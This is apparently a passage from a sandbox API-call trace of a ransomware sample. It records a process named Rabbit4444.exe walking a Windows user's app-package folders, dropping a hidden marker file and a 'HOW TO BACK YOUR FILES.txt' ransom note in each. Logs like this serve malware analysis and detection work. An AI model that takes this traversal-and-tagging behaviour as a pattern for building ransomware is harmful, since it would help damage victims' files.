(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.094] CloseHandle (hObject=0x2cc) returned 1 [0064.095] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies") returned 103 [0064.095] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.095] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1871c50, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.095] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.095] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.095] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.095] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.095] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1871c50, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.095] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.095] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.095] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.095] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.095] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.095] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef869bb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef869bb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.095] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.095] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.095] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef869bb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef869bb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.095] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.095] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.096] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.096] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.096] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.096] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.097] CloseHandle (hObject=0x2a0) returned 1 [0064.097] CloseHandle (hObject=0x2cc) returned 1 [0064.097] GetCurrentThreadId () returned 0xd98 [0064.097] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0064.097] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache" [0064.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0064.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0064.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache" [0064.097] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\" [0064.097] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0064.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.098] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.100] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.101] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.101] CloseHandle (hObject=0x2cc) returned 1 [0064.102] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache") returned 101 [0064.102] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.102] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd187150f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0064.102] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.102] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.102] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.102] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.102] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd187150f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.102] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.102] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.102] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.102] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.102] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.102] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef869bb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef869bb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.102] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.102] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.102] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef869bb9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef869bb9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef869bb9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.102] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0064.102] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.103] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.103] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.104] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.104] CloseHandle (hObject=0x2a0) returned 1 [0064.104] CloseHandle (hObject=0x2cc) returned 1 [0064.104] GetCurrentThreadId () returned 0xd98 [0064.104] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0064.104] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi" [0064.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117378 | out: hHeap=0xe0000) returned 1 [0064.104] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0064.104] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi" [0064.104] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\" [0064.104] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3" [0064.104] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\backgroundtransferapi\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.106] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.109] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.109] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.110] CloseHandle (hObject=0x2cc) returned 1 [0064.110] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi") returned 113 [0064.110] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.110] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1870a2f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.110] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.110] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.110] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.110] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.110] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1870a2f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.110] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.110] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.110] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.110] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.111] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.111] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef88fbac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef88fbac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.111] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.111] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.111] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef88fbac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef88fbac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.111] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0064.111] lstrcpyW (in: lpString1=0x130ec1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\BackgroundTransferApi\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\backgroundtransferapi\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.111] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.111] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.112] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.112] CloseHandle (hObject=0x2a0) returned 1 [0064.112] CloseHandle (hObject=0x2cc) returned 1 [0064.112] GetCurrentThreadId () returned 0xd98 [0064.112] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122028 [0064.112] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe" [0064.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e158 | out: hHeap=0xe0000) returned 1 [0064.112] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122020 | out: hHeap=0xe0000) returned 1 [0064.112] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe" [0064.112] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\" [0064.112] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0064.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.115] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.118] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.119] CloseHandle (hObject=0x2cc) returned 1 [0064.119] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe") returned 76 [0064.119] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.119] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef81c039, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0064.119] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.119] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.119] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.119] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.120] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef81c039, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef88fbac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", 